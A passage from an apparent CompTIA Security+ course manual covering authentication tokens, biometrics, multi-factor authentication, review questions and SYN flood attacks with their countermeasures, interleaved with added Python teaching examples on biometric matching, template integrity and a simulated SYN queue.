                  limited period of time and is then no longer accepted. Even if it is intercepted, the
                  captured value is useless as soon as the legitimate login completes or the time window
                  passes. One-time passwords are typically generated using one of two strategies, by
                  employing counter-based or clock-based tokens:
                      • A counter-based token is an active token that produces one-time passwords by
                        combining its secret base key with a counter that is synchronized with a
                        counter in the server. Normally, you obtain a fresh password by pressing a
                        button on the front of the token, which also advances the counter.
                      • A clock-based token is an active token that produces one-time passwords by
                        combining its secret base key with the current time read from an internal
                        clock, so that a new password appears at a fixed interval.
                  Both of these methods employ means to resynchronize the token’s counter or clock if
                  they vary too much from the corresponding server’s counter or clock, for example by
                  having the server accept codes from a small window of counter values or time steps
                  around the one it expects.
                  Although one-time password technologies significantly reduce the risk of attacks
                  relative to static password technologies, they are still open to certain kinds of
                  attack, such as phone line redirection attacks (which divert an authenticated
                  connection to capture transmitted data), IP address theft, and man-in-the-middle
                  attacks, in which the attacker relays a still-valid code to the real server before
                  the user does.

Do it!   E-1:   Discussing tokens
          Questions and answers
          1 An active token does not emit or otherwise share its base key. True or false?

            True

          2 A passive token holds a microchip in order to perform a function or calculation on
            the base key information. True or false?

            False: This describes an active token.

          3 Explain the difference between counter-based and clock-based tokens.

            Counter-based tokens produce one-time passwords by combining the secret password with
            a counter that is synchronized with a counter in a server; clock-based tokens produce one-
            time passwords by combining a secret password with an internal clock that is synchronized
            with the server’s clock.


Topic F: Biometrics
                     This topic covers the following CompTIA Security+ exam objectives:

                      #      Objective

                      1.2    Recognize and be able to differentiate and explain the following methods of authentication
                              • Multi-factor
                              • Biometrics

                      5.1    Understand the application of the following concepts of physical security
                              • Access Control
                                  • Biometrics




                     Introducing biometric authentication
Explanation          Biometric authentication is based upon an individual’s unique physical or behavioral
                     characteristics. Physical characteristics that are commonly measured include
                     fingerprints, hand geometry, retinal and iris patterns, and facial characteristics.
                     Behavioral characteristics that are commonly measured include handwritten signatures
                     and voice.
                     Biometrics is often described as the strongest form of authentication because it relies
                     on measuring who an individual is, rather than what they know or what they have, and as
                     the most convenient because the person need not remember anything or carry anything with
                     them. Two caveats apply: a biometric is not a secret (fingerprints and faces are left and
                     shown everywhere), and unlike a password or token it cannot be reissued if a copy is
                     captured, so a biometric system depends on its sensor resisting spoofing and is best
                     used as one factor alongside another.
                     This section examines how a biometric authentication system works, how each of the
                     physical and behavioral characteristics is measured, the strengths and weaknesses
                     associated with those measurements, and the general trends and issues associated with
                     biometric authentication as a whole.

                     How a biometric authentication system works
                     The process by which a biometric authentication system works is outlined in the
                     following steps. The first four steps of this process are used to collect initial biometric
                     measurements of an individual. Steps five through eight in the following list correspond
                     to the authentication process that takes place when that individual needs to be
                     authenticated to access a restricted area, whether that area is a room in a building or a
                     computer/network resource.
                          1 Your identity is verified using acceptable forms of identification, such as a
                             driver’s license, passport, or company identity badge.
                          2 Your chosen biometric (fingerprint, iris features, handwritten signature, and so
                             on) needs to be scanned for the first time.
                          3 The biometric information must then be analyzed by a computer and put into an
                             electronic template.
                          4 The template is then stored in some kind of repository (a local repository, a
                             central repository, or a portable token such as a smart card).
                          5 When you wish to gain access to restricted areas of a building or computer
                             system, your chosen biometric must be scanned again.

    6 A computer then analyzes the biometric data and compares it to the data stored
      in the preexisting template.
    7 If the data provided by the current biometric scan sufficiently matches the data
      stored in the preexisting template, then the person is allowed access to the
      restricted area.
    8 Following the authenticate, authorize, and audit (AAA) model introduced at the
      beginning of this unit, a record of the authentication should be kept so that an
      access audit can be performed later.

False positives and false negatives
Although biometric authentication is generally considered the most accurate of all
authentication methods, it is not perfect. Unauthorized people are sometimes
authenticated when they should not be and authorized people might be rejected even
though they are actually who they claim to be.
As mentioned previously, during the biometric authentication process, a person’s
current biometric data is compared to a preexisting template of the original biometric
data. System administrators have the ability to set the degree to which the two should
match in order for a person to be authenticated by the system. System administrators
generally require higher degrees of similarity between the current and preexisting
biometric data in highly secure environments and lower degrees of similarity in
environments that are deemed less sensitive.

False positive results
When an unauthorized person is wrongly authenticated by biometric means, it is
referred to as a false positive result. The likelihood of this happening increases when
the biometric data-matching standards are set too low. This can occur when the
administrator does not place the need for security above users’ general frustration at
having their biometric data scanned repeatedly when they want to gain access to a
restricted area. A false positive result can also occur when there is a desire to move
many people through the scanning process in a short period of time, such as when
biometric authentication of fingerprints is used to allow many employees to enter the
building at the beginning of each work period.

False negative results
When an authorized person, who is actually who they claim to be and who has the
authority to gain access to a restricted area, is not authenticated by biometric means,
it is referred to as a false negative result. This can occur when the biometric being
measured has changed for some reason since the initial scan was taken. For example, if
a man has grown or shaved off a beard, his current biometric data can differ greatly
from that which was gathered during the initial scan.
False negatives can result in lost productivity when employees cannot gain access to the
resources they need to perform their job duties. They can take up valuable time of
network administrators to rectify the problem, and finally, they cause a great deal of
frustration for the person who is authorized, but unable, to access certain crucial areas.
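The enrollment and verification steps listed earlier, together with the effect of the administrator’s matching threshold on false positives and false negatives, as an added Python example. This is not code from the course manual: the feature vectors, the similarity score and the two lists of match scores are constructed for illustration, and a real product would supply its own feature extraction and matcher.

```python
"""Added example, not from the course manual: a toy biometric verifier."""
from dataclasses import dataclass, field
from datetime import datetime, timezone
from math import sqrt


def similarity(a, b):
    """Constructed match score in [0, 1]: 1.0 for identical feature vectors,
    falling towards 0 as the Euclidean distance between them grows."""
    dist = sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))
    return max(0.0, 1.0 - dist)


@dataclass
class BiometricSystem:
    threshold: float                                # required similarity, set by the administrator
    templates: dict = field(default_factory=dict)   # the template repository (steps 3 and 4)
    audit_log: list = field(default_factory=list)   # accounting record (step 8)

    def enroll(self, user, identity_verified, scan):
        """Steps 1 to 4: store a template only after identity has been verified out of band."""
        if not identity_verified:
            raise PermissionError("enrollment requires a verified identity")
        self.templates[user] = tuple(scan)
        return True

    def authenticate(self, user, scan):
        """Steps 5 to 8: rescan, compare with the stored template, decide, record the decision."""
        template = self.templates.get(user)
        if template is None:
            self._record(user, None, False)
            return False
        score = similarity(template, scan)
        granted = score >= self.threshold
        self._record(user, score, granted)
        return granted

    def _record(self, user, score, granted):
        self.audit_log.append({"time": datetime.now(timezone.utc).isoformat(),
                               "user": user, "score": score, "granted": granted})


def error_rates(threshold, genuine_scores, impostor_scores):
    """(false positive rate, false negative rate) for a threshold: impostors scoring
    at or above it are wrongly accepted, genuine users scoring below it are wrongly rejected."""
    false_positive = sum(s >= threshold for s in impostor_scores) / len(impostor_scores)
    false_negative = sum(s < threshold for s in genuine_scores) / len(genuine_scores)
    return false_positive, false_negative


# Constructed match scores. Repeat scans of enrolled users score high but not
# perfectly (dirty sensor, a new beard); strangers score low, but the two
# distributions overlap, which is why no threshold removes both error types.
GENUINE = [0.97, 0.93, 0.90, 0.88, 0.85, 0.82, 0.79, 0.76, 0.70, 0.66]
IMPOSTOR = [0.20, 0.31, 0.38, 0.45, 0.52, 0.58, 0.63, 0.68, 0.72, 0.77]


if __name__ == "__main__":
    system = BiometricSystem(threshold=0.75)
    system.enroll("alice", identity_verified=True, scan=(0.50, 0.40, 0.60))
    print(system.authenticate("alice", (0.52, 0.41, 0.58)))   # slight drift: accepted
    print(system.authenticate("alice", (0.10, 0.90, 0.20)))   # different person: rejected
    for t in (0.60, 0.75, 0.80):
        print(f"threshold {t}: (false positive, false negative) = {error_rates(t, GENUINE, IMPOSTOR)}")
```

Running the script shows the trade-off the text describes: at a threshold of 0.60 no genuine user is rejected but 40% of the impostor scans are accepted, and at 0.80 no impostor gets in but 40% of the genuine scans are rejected. The threshold therefore encodes the security-versus-frustration decision, and the audit log keeps every decision and score for later review.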

                  Different kinds of biometrics
                  The following sections on physical and behavioral characteristics highlight what is
                  being measured during the various types of biometric authentication procedures and the
                  basic strengths and weaknesses of each.

                  Physical characteristics
                  Physical characteristics are those that are actually part of a person, such as the patterns
                  found on their fingerprint or iris, or the size of the various parts of their hand.
                  Fingerprints — A fingerprint scanner looks at the patterns found on the surface of a
                  fingertip. It is the oldest and most widely deployed biometric technology. Because of
                  this, prices of these devices (shown in Exhibit 2-4) are relatively low.




                  Exhibit 2-4: Fingerprint scanner by DigitalPersona

                  A fingerprint scanner can be deployed in a broad range of environments; it provides
                  flexibility and increased system accuracy by allowing users to enroll multiple fingers in
                  the template system. Its weaknesses include the fact that it might not work properly if
                  the fingertip or the device sensor is dirty, and that it is associated with criminality.
                  Hand geometry — Hand geometry authentication involves measuring and analyzing
                  the dimensions of the hand. This biometric is relatively easy to use; moreover, simple
                  integration into other systems and processes, combined with an ability to scan people
                  quickly and easily, makes this a popular choice for many companies. Relative to other
                  biometrics, it has limited accuracy because the measurements of people’s hands are
                  relatively similar. Furthermore, a hand-scanning device (shown in Exhibit 2-5) is rather
                  large and is unsuitable for cramped locations.




Exhibit 2-5: Hand geometry scanner: HandkeyII by Recognition Systems Inc.

Retinal scanning — Retinal scanning involves analyzing the layer of blood vessels
located at the back of the eye. This method is highly accurate, is very difficult to spoof,
and measures a stable physiological trait. It’s difficult to use because it requires the user
to focus on a specific point in a receptacle (shown in Exhibit 2-6), and like a hand
scanner, it is a relatively large device that would not work well in many situations. This
is very expensive technology and might be appropriate only in very high-security areas.




Exhibit 2-6: Retinal scanner by Eyedentify Inc.

                  Iris scanning — Iris scanning involves analyzing the patterns of the colored part of the
                  eye surrounding the pupil. It uses a relatively normal camera (shown in Exhibit 2-7) and
                  does not require close contact between the eye and the scanner. Glasses can be worn
                  during an iris scan, unlike a retinal scan. Template matching rates for this technology
                  are very high; however, ease of use is still not very high compared to other methods.




                  Exhibit 2-7: Iris scanner by Panasonic Authenticam

                  Facial scanning — Facial scanning biometrics involves analyzing facial characteristics.
                  It is a unique biometric in that it does not require the cooperation of the scanned
                  individual: it can utilize almost any high-resolution image acquisition device such as a
                  still or motion camera. Although this discussion is primarily concerned with the use of
                  facial scanning to authenticate people trying to gain access to electronic resources, some
                  government agencies are increasingly interested in using publicly placed cameras and
                  driver license photos to help identify and track criminals and terrorists. Weaknesses in
                  this system include the fact that scanning capabilities can be reduced in low light, facial
                  features can change over time, and there are some concerns about the use of this
                  technology on unsuspecting people who do not know they are being scanned.

                  Behavioral characteristics
                  Behavioral characteristics are those that are exhibited by an individual, such as the way
                  a person signs her name or speaks a predetermined phrase, rather than characteristics
                  that are actually a part of the physical makeup of that person, such as a fingerprint or the
                  patterns of the iris or retina.
                  Handwritten signature verification analyzes the way people sign their name, such as
                  speed and pressure, as well as the final static shape of the signature itself. Signature
                  scanning (Exhibit 2-8) is relatively accurate and, of course, people are already familiar
                  with it as a form of authentication, which means they might not feel as invaded using
                  this technology as they might with a fingerprint scan. A major weakness in this method
                  is not with the technology, but with the user. Most people do not sign their name in a
                  consistent manner, which can cause a high error rate when using this system to
                  authenticate. Ironically, the presence of a physical signature is often the rationale for not
                  adding more robust authentication methods.




Exhibit 2-8: Signature scanner by Interlink ePad VP9105

Voice authentication relies on voice-to-print technologies, not voice recognition. In this
process, your voice is transformed into text and compared to an original template.
Although this is fairly easy technology to implement because many computers already
have built-in microphones, the enrollment procedure is more complicated than other
biometrics, and background noise can interfere with the scanning, which can be
frustrating to the user.

General trends in biometrics
Although biometrics tends to be far more reliable in terms of authentication than other
means, it is generally too expensive for everyday use by individuals. A more promising
area of biometric usage, other than their traditional use in highly secure areas, is in
authenticating large numbers of people over a short period. This might become
especially useful when smart cards gain wider acceptance because people can hold their
own biometric information (something they generally prefer for privacy reasons) and
simply insert the card into a slot and use whatever biometric scanner is required to prove
their identity.
The use of biometrics to gain remote access to controlled areas is also expected to rise,
as users’ fear of identity theft during password authentication increases. Currently,
however, factors limiting dramatic growth in this area are the large number of vendors
and the different standards available. There needs to be more standardization in the
industry before many companies will be willing to invest in such new technologies.
Those companies that do invest will only require users who have access to very
sensitive information and applications to use biometric authentication.
Even though a biometric might be very difficult, if not impossible, to duplicate, steal, or
forge, the templates that hold biometric patterns that are compared to the actual person
during the time of authentication are still held in servers, which must be both physically
and electronically secure. If a hacker were able to gain access to the files that link
information about a user with their biometric, he or she would be able to copy their own
biometric templates into that system, give themselves authority to access sensitive areas,
or simply prevent others who should be allowed from doing so.
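One way to address the template-repository risk just described, as an added Python example that is not from the course manual: each stored template is bound to its user id with an HMAC, and a second HMAC covers the list of enrolled users, so a template that is replaced, a record that is inserted, or a record that is removed is detected when the repository is loaded. The sealing key, the user names and the feature vectors are constructed for the example; the assumption is that the key is stored apart from the repository (in an HSM or key store), which is what makes the tags unforgeable for someone who only has file access.

```python
"""Added example, not from the course manual: integrity-protecting a biometric
template repository so that substituted, inserted or deleted templates are noticed."""
import hashlib
import hmac
import json

# Constructed key for the example. In practice the key lives away from the
# repository (HSM, key vault), so that someone who can read or write the
# template files still cannot compute valid tags.
SEALING_KEY = b"constructed-example-sealing-key"


def _canonical(user, template):
    # Deterministic serialisation so the same (user, template) always yields the same tag.
    return json.dumps({"user": user, "template": list(template)}, sort_keys=True).encode()


def seal_template(user, template, key=SEALING_KEY):
    """Bind a user id to its template with an HMAC; returns the record to store."""
    tag = hmac.new(key, _canonical(user, template), hashlib.sha256).hexdigest()
    return {"user": user, "template": list(template), "tag": tag}


def seal_manifest(records, key=SEALING_KEY):
    """Tag over the sorted set of enrolled user ids, so a removed record is noticed too."""
    users = json.dumps(sorted(r["user"] for r in records)).encode()
    return hmac.new(key, users, hashlib.sha256).hexdigest()


def record_is_valid(record, key=SEALING_KEY):
    expected = hmac.new(key, _canonical(record["user"], record["template"]),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, record["tag"])


def load_repository(records, manifest_tag, key=SEALING_KEY):
    """Return (templates safe to use, list of problems). Records failing their tag are not loaded."""
    templates, problems = {}, []
    for r in records:
        if record_is_valid(r, key):
            templates[r["user"]] = tuple(r["template"])
        else:
            problems.append(f"bad tag for {r['user']}")
    if not hmac.compare_digest(seal_manifest(records, key), manifest_tag):
        problems.append("manifest mismatch: records added or removed")
    return templates, problems


def demo():
    """Play the scenario from the text: an intruder with file access but no key."""
    repo = [seal_template("alice", (0.50, 0.40, 0.60)),
            seal_template("bob", (0.30, 0.70, 0.20))]
    manifest = seal_manifest(repo)

    tampered = [dict(r) for r in repo]
    tampered[0]["template"] = [0.10, 0.90, 0.20]   # own features stored under alice's name
    tampered.append({"user": "mallory", "template": [0.10, 0.90, 0.20], "tag": "0" * 64})  # self-enrolment
    del tampered[1]                                  # bob removed so he can no longer get in
    return load_repository(tampered, manifest)


if __name__ == "__main__":
    print(demo())
```

The demo() function plays the scenario from the text against the sealed repository: the substituted template and the self-enrolled record fail their tags, and the manifest check notices the missing user, so none of the tampered records is loaded. Integrity tags do not hide the templates, so the repository still needs the physical and electronic protection the text calls for, and the sealing key needs protecting most of all.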

                  Multi-factor authentication
                  There are three commonly recognized factors of authentication:
                      • Something you know, such as a password
                      • Something you have, such as a smart card
                      • Who you are (something about you), such as a biometric
                  Multi-factor authentication requires that an individual be positively identified using at
                  least one means of authentication from at least two of these three factors. When
                  choosing which methods and how many factors to use to authenticate a person, it’s
                  important to consider several implications of your choice. Each method of
                  authentication has certain strengths and weaknesses and each, appropriately, requires
                  people to exert a varying degree of time and effort to prove they are who they say they
                  are.
                  Adding additional factors of authenticity to your identification process decreases the
                  likelihood that an unauthorized person can compromise your electronic security system,
                  but it also increases the cost of maintaining that system. When deciding the degree of
                  assurance you need about a person’s identity, it is important to take into account both
                  the cost of having an unauthorized person compromise your electronic security and the
                  cost of having authorized people authenticate themselves before having access to the
                  data and services they need on your network. As the cost of compromising your
                  electronic security increases, so should your willingness to pay for that security,
                  whether through the purchase and upkeep of hardware and software or through the
                  expense of lost worker productivity.

Do it!   F-1:   Understanding how biometrics work
          Questions and answers
          1 Name four features that are measured using biometrics.

            Answers might include:
            • Fingerprints
            • Hand geometry
            • Retinal and iris patterns
            • Facial characteristics
            • Handwritten signature

          2 Biometrics is the most secure form of authentication because it relies on
            measuring:
            A    What you know
            B    What you have
            C    Who you are

          3 Which of the following circumstances can result in a false negative?
            A    An authorized person is not authenticated
            B    An unauthorized person is wrongly authenticated
            C    An authorized person is authenticated but denied access to needed areas

          4 Identify some of the benefits and drawbacks of using retinal scanning.

            Benefits: Highly accurate, difficult to spoof, measures stable physiological trait

            Drawbacks: Difficult to use, relatively large device, expensive

          5 Which of the following biometrics measures behavioral characteristics?
            A    Handwritten signatures
            B    Iris scanning
            C    Fingerprints
            D    Voice


Unit summary: Authentication
Topic A              In this topic you learned how the AAA model (authentication, authorization, and
                     accounting) is applied to achieve security goals. You learned some techniques for
                     creating strong passwords and storing them securely. You also learned how to modify
                     the Windows Server 2003 local security policy to harden the system against attacks.
Topic B              In this topic, you saw how Kerberos provides a secure and convenient way for
                     individuals to gain access to data and services through the use of session keys, tickets,
                     authenticators, authentication servers, ticket-granting tickets, ticket-granting servers,
                     and cross-realm authentication.
Topic C              In this topic, you learned about CHAP. You learned that CHAP provides a way for an
                     authenticator to authenticate a peer using an encrypted challenge-and-response
                     sequence.
Topic D              In this topic, you learned about private and public keys, digital certificates, and
                     digital signatures. You learned how private and public keys and digital certificates
                     authenticated by a trusted third party allow individuals and organizations to
                     communicate with each other in a secure way.
Topic E              In this topic, you learned how tokens allow individuals to use strong passwords when
                     logging on to a computer or network system.
Topic F              In this topic, you learned that biometrics provide the strongest means of individual
                     authentication because they rely on measurements of individual physical
                     characteristics and behaviors.

                     Review questions
                       1 Which of the following best describes authentication?
                         A The process of gaining access to resources
                         B The process of utilizing resources
                         C   The process of verifying the identification of a user
                         D The process of assigning permissions to users
                       2 What is the advantage in removing the name of the last user to log on?
                         A Allows users to share computers
                         B Requires users to remember their usernames
                         C   Requires a hacker to take an extra step when cracking passwords
                         D Hides the identity of the Windows Domain

3 Why is password length important?
  A Longer passwords are impossible to hack
  B   Longer passwords are harder to hack
  C Windows requires long passwords in a domain environment
  D Longer passwords can prevent password cracking programs from working
    properly
4 What is the password length recommended by most security professionals?
  A Six or more characters
  B Five or more characters
  C Eight or more characters
  D   Seven or more characters
5 Why are complex passwords important? (Choose all that apply.)
  A   Complex passwords are more difficult to crack
  B The complexity of passwords adds to the security of long passwords
  C Complex passwords are impossible to crack
  D   Complex passwords help users create strong passwords
6 Which of the following is considered a complex password? (Choose all that apply.)
  A   @1c4htj3

  B   Pa$$w0rd
  C ncdjszkjdnc
  D   Ajd649sg
7 CHAP stands for Challenge Handshake Authorization Protocol (CHAP). True or
  false?
  False: CHAP stands for Challenge Handshake Authentication Protocol.

8 Which of the following is not a part of the CHAP authentication process?
  A The authenticating server compares the value it receives from the peer with the
    hash value it expects by calculating its own expected hash value.
  B   The peer sends a challenge message to the authenticating server.

  C The peer creates a variable-length value using a one-way hash function on a
    fixed-length input message.
  D The authenticating server issues new challenge messages to the peer at random
    intervals throughout the communication session.
  E The CHAP authentication process starts after the authenticating server tells the
    peer that CHAP will be used.

                     9 There are many different password conventions; what are the basic rules to follow
                       in order to safeguard your passwords? (Choose all that apply.)
                      A   Passwords must be memorized. If they must be written down, the written records
                          must be locked up.
                      B   Each password you choose must be different from any other that you use.

                      C   Passwords must be at least six characters long, and probably longer, depending
                          on the size of the character set used.
                      D   Passwords must contain a mixture of letters (both uppercase and lowercase),
                          numbers, and other characters, such as %, !, or &.
                      E   Passwords must be changed periodically.

                  10 Kerberos assumes that none of the workstations or servers is physically secure and
                     that bad guys can position themselves between the user and the service being
                     sought. True or false?
                      False: Kerberos assumes that workstations, servers, and other devices that are connected to the
                      network are physically secure, and that there is no way for an attacker to gain access to a
                      password by establishing a position between the user and the service being sought.

                  11 In a Kerberos system, after a client has received a ticket from an authentication
                     server, it creates and adds an authenticator that contains the user’s username and
                     time stamp. True or false?
                      True

                  12 The authenticator in a CHAP session must return either a “success” or “failure”
                     message to the sender once it has compared the expected hash value to the actual
                     hash value. True or false?
                      True

                  13 Explain the difference between symmetric and asymmetric encryption.
                      In symmetric encryption, one key both encrypts and decrypts a message, and in asymmetric
                      encryption, one key is used to encrypt the message and a different key is used to decrypt it.

                  14 An active token is a device that creates and shares modified or encrypted forms of
                     the base key. True or false?
                      True

                  15 One-time passwords are vulnerable to which of the following attacks?
                      A   Phone line redirection attacks

                      B   IP theft
                      C Dictionary attacks
                      D   Man-in-the-middle attacks

16 Which of the following is an example of a biometric? (Choose all that apply.)
    A Complex passwords
    B   Fingerprints

    C   Retinal scans

    D Smart cards
17 A biometric that involves the measurement and analysis of different hand
   characteristics and measurements is called:
    A Fingerprints
    B Facial recognition
    C   Hand geometry
    D All of the above
18 A biometric that involves analyzing voice characters and measurements is called:
    A Voice-to-print technology
    B Facial recognition
    C Sound technology
    D   Voice authentication


Independent practice activity
RunAs allows an administrator to log on with a standard user account and still run
administrative programs with administrative rights. Those rights are only applied to the
application, so viruses, worms, and Trojan Horses cannot access the network with
administrative privileges.
 1 Log on as User2.
 2 Click Start, then choose Control Panel.
 3 Double-click Local Security Policy. The User2 account should not be able to edit
   the Local Security Policy.
    Click OK.
 4 Right-click Local Security Policy. Click Run As….
 5 Select The following user. Enter the necessary administrator account information,
   and then click OK. You can now edit the local security policy.
 6 Which of the following is an advantage in using the RunAs command?
    A Allows users to bypass security without permission
    B Helps prevent the spread of viruses
    C Conserves resources for administrators
    D   Allows administrators to check e-mail and administer the network

                    7 Which of the following is a disadvantage of the RunAs command? (Choose all that
                      apply.)
                      A Opens potential security holes
                      B   Allows users to install applications if they know the local administrator
                          password
                      C   Allows users to access administrative tools if they know the local administrator
                          password
                      D Allows users to change account permissions
                    8 How can you use RunAs on an existing shortcut?
                      A Hold down the Alt key and right-click the shortcut
                      B Right-click the shortcut
                      C   Hold down the Shift key and right-click the shortcut
                      D Hold down the Ctrl key and right-click the shortcut
                    9 What application should you not use RunAs to execute?
                      A A virus scanner
                      B An e-mail application
                      C   A word processor
                      D An auditing program
                  10 How can you prevent users from using RunAs?
                      A Delete the RunAs command
                      B   Disable the RunAs Service
                      C Disable the Server Service
                      D Delete the RunAs.dll file


Unit 3
Attacks and malicious code
                        Unit time: 180 minutes

                        Complete this unit, and you’ll know how to:

                        A Recognize and defend against denial-of-service (DoS) attacks, including SYN flood,
                          Smurf, Ping of Death, and Distributed Denial of Service (DDoS) attacks.

                        B Identify man-in-the-middle attacks.

                        C Recognize the major types of spoofing attacks, including IP address spoofing,
                          ARP poisoning, Web spoofing, and DNS spoofing.

                        D Discuss replay attacks.

                        E Explain TCP session hijacking.

                        F Detail various types of social-engineering attacks, and explain why they can be
                          extremely damaging.

                        G List the major types of attacks used against encrypted data.

                        H List the major types of attacks used against encrypted data.


Topic A: Denial of service attacks
                     This topic covers the following CompTIA Security+ exam objectives:

                      #      Objective

                      1.3    Identify non-essential services and protocols and know what actions to take to reduce the risks of
                             those services and protocols

                      1.4    Recognize the following attacks and specify the appropriate actions to take to mitigate
                             vulnerability and risk
                              • DOS / DDOS (Denial of Service / Distributed Denial of Service)




                     Introducing denial of service attacks
Explanation          A denial-of-service (DoS) attack is any attack that consumes or disables resources in
                     order to interrupt services to legitimate users. The objective of the DoS attack is to
                     disrupt normal operations, but not destroy or steal data. This causes inconvenience at
                     best, diminished revenue and reputation for the victim at worst.
                     DoS attacks represent a major problem for security administrators because they take
                     numerous forms, are very common, and can be very costly to the attacked businesses. A
                     wide range of attack tools is available that allows malicious users to attack systems of
                     all sorts, and many of the tools have easy-to-use graphical user interfaces. A DoS
                     attacker need not have deep knowledge of networks or systems in order to launch a
                     damaging attack, because many of the attack tools require only basic computer
                     knowledge to operate.
                     Modes of attack include:
                       • Causing an application or operating system on a victim’s computer to crash,
                           making it unusable to legitimate users.
                       • Clogging network connections to a Web server with illegitimate traffic, slowing
                           the user’s traffic down, or making it completely unable to reach the Web site.
                       • Overloading the victim system by consuming resources such as disk space,
                           bandwidth, buffers, and queues. An overwhelmed system might offer its users
                           very sluggish performance or might be completely unusable.
                       • Using the normal behavior of a system to deny access to its users. For example,
                           an attacker could cause a user to be locked out of a given computer by
                           attempting to log on to the system with an incorrect password three times. Many
                           computer systems lock out a user’s account for a preset time period after the
                           third failed logon attempt.
                       • Remotely causing a network device to crash, temporarily making the network
                           inaccessible to attached devices.
                       • Overwhelming a DNS server with lookup requests until it runs out of memory
                           and crashes, making it impossible to resolve addresses for the domains it serves,
                           and thereby interrupting access to any Web pages within the domain.
                     Security administrators should be familiar with the more common DoS attacks in order
                     to secure their networks and systems from such attacks. A representative sampling of
                     attacks is presented in the following sections.
                                                                                  Attacks and malicious code       3–3

                            SYN flood
                            A SYN flood attack prevents users from accessing a target server by flooding it with
                            half-open TCP connections.
                            Normal TCP connections between two hosts are arranged with an exchange of three
                            packets.
                               1 The first packet is sent from the client to the server with the SYN flag set.
                               2 The server acknowledges the session by replying with a packet that has both the
                                   SYN and the ACK flags set (a SYN/ACK packet).
                               3 The client responds to the server with an ACK packet. The TCP session is
                                   completely established and the two hosts are able to exchange data.
                            If, for some reason, the client doesn’t complete the connection by sending the ACK
                            packet, the server waits a couple of minutes, giving the client plenty of time to respond,
                            before clearing the uncompleted connection from memory and making it available for
                            use by others. The TCP session setup process is shown in Exhibit 3-1.



                             Exhibit 3-1: TCP three-way handshake

If students question what the abbreviations in the Exhibit mean: SEQ is the packet sequence number, CTL is the control flag, SYN is the synchronize control flag, and ACK is acknowledgement. More information about three-way handshakes can be found in RFC 793.

                            Although most computer systems can handle many established network connections,
                            they usually can handle only a handful of connections that are in the process of being
                            established (or half-open connections). This is because connections are usually set up in
                            such a short amount of time that there is no need for a long queue for half-open
                            connections.

                            Conducting SYN flood attacks
                            An attacker can render a machine unavailable to network users by filling the half-open
                            connections queue—without permitting the connections to be completed and moved into
                            the list of fully open connections. This is accomplished by flooding the server with SYN
                             packets that have a spoofed source address. The server responds with a SYN/ACK
                            packet to the fake source address, but never receives the ACK reply, which is needed to
                            complete the TCP connection. The server cannot accept any more TCP connections
                            until the half-open connections time-out, so legitimate users can be prevented from
                            reaching the server.
3–4   CompTIA Security+ Certification

                 Countermeasures
                 Many commercial firewall products have features to reduce the effect of SYN floods.
                 The firewall sits between the attacking client machine and the attacked server, so it has
                 the ability to withhold or insert packets into the data stream as necessary to thwart SYN
                 floods.
                 One strategy used by firewalls is to immediately respond to the server’s SYN/ACK
                 packet with an ACK that uses the spoofed IP address of the client, as shown in
                 Exhibit 3-2.
                 This permits the server to move the session out of the half-open connections queue. If
                 the connection is a legitimate one, the client shortly responds with its own ACK packet,
                 which the firewall can forward to the server with no negative impact. If the connection
                 is not legitimate, then no ACK is forthcoming from the client. In this case, the firewall
                 can safely kill the TCP session by sending the server an RST (reset) packet.
                 This is just one example of how firewalls can mitigate the effect of SYN floods; every
                 firewall manufacturer has its own strategy. Other countermeasures include:
                      • Increase the size of the server’s half-open connection queue.
                      • Decrease the queue’s time-out period.
                      • Limit the number of half-open connections accepted from a single IP address.
                      • Use network-based intrusion detection systems that can detect SYN floods and
                        notify administrators.




                 Exhibit 3-2: Defending against the SYN flood
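The handshake sequence and the firewall strategy of Exhibit 3-2 can be checked in a small model of the server’s half-open connection queue. The following Python block is an added example written for this section, not code from the course manual or from any firewall product: the queue capacity, the 120-second time-out and the 198.51.100.x/203.0.113.x addresses are constructed values. It runs the same spoofed-SYN flood three times: against an unprotected queue, against a queue with a shortened time-out (the second countermeasure above), and behind a firewall that answers the SYN/ACK itself and later resets the sessions the real client never acknowledges.

```python
"""Model of a server's half-open (SYN) queue under a SYN flood and of the
firewall strategy in Exhibit 3-2.  Added example for this section, not code
from the course manual or any firewall product; sizes, timeouts and
addresses are constructed values."""


class HalfOpenQueue:
    """Server-side table of connections that have received a SYN and sent a
    SYN/ACK but are still waiting for the client's ACK (step 3)."""

    def __init__(self, capacity, timeout):
        self.capacity = capacity        # half-open entries that fit (assumption)
        self.timeout = timeout          # seconds before an unanswered entry is dropped
        self.pending = {}               # src -> time the SYN arrived
        self.established = set()        # sessions that completed the handshake
        self.rejected = 0               # SYNs dropped because the queue was full

    def expire(self, now):
        """Clear entries whose SYN/ACK has gone unanswered for the whole timeout."""
        for src, t in list(self.pending.items()):
            if now - t >= self.timeout:
                del self.pending[src]

    def syn(self, src, now):
        """Step 1: a SYN arrives.  Returns False if the queue is full."""
        self.expire(now)
        if len(self.pending) >= self.capacity:
            self.rejected += 1
            return False
        self.pending[src] = now         # server sends SYN/ACK and waits
        return True

    def ack(self, src):
        """Step 3: the ACK arrives and the session becomes fully open."""
        if src not in self.pending:
            return False
        del self.pending[src]
        self.established.add(src)
        return True

    def rst(self, src):
        """An RST tears the session down, whether half-open or established."""
        self.pending.pop(src, None)
        self.established.discard(src)


def run_flood(capacity=8, timeout=120, firewall_proxy=False):
    """100 spoofed SYNs arrive at t=0, then one legitimate client at t=1.
    Returns whether the legitimate client got through, how many sessions
    are established afterwards and how many SYNs the server rejected."""
    q = HalfOpenQueue(capacity, timeout)
    # Constructed spoofed sources (RFC 5737 documentation range); nobody
    # there will ever answer the server's SYN/ACK.
    spoofed = [("198.51.100.%d" % (i % 250 + 1), 40000 + i) for i in range(100)]
    for src in spoofed:
        if q.syn(src, now=0) and firewall_proxy:
            # The firewall immediately answers the SYN/ACK with an ACK bearing
            # the (spoofed) client address, so the server moves the entry out
            # of the half-open queue.
            q.ack(src)
    if firewall_proxy:
        # No ACK ever comes from the real "clients", so the firewall resets
        # each proxied session instead of forwarding anything.
        for src in spoofed:
            q.rst(src)
    legit = ("203.0.113.7", 51000)      # constructed legitimate client
    connected = q.syn(legit, now=1) and q.ack(legit)
    return {"legit_connected": connected,
            "established": len(q.established),
            "rejected": q.rejected}


if __name__ == "__main__":
    print("unprotected:       ", run_flood())
    print("short time-out:    ", run_flood(timeout=0.5))
    print("firewall proxy ACK:", run_flood(firewall_proxy=True))
```

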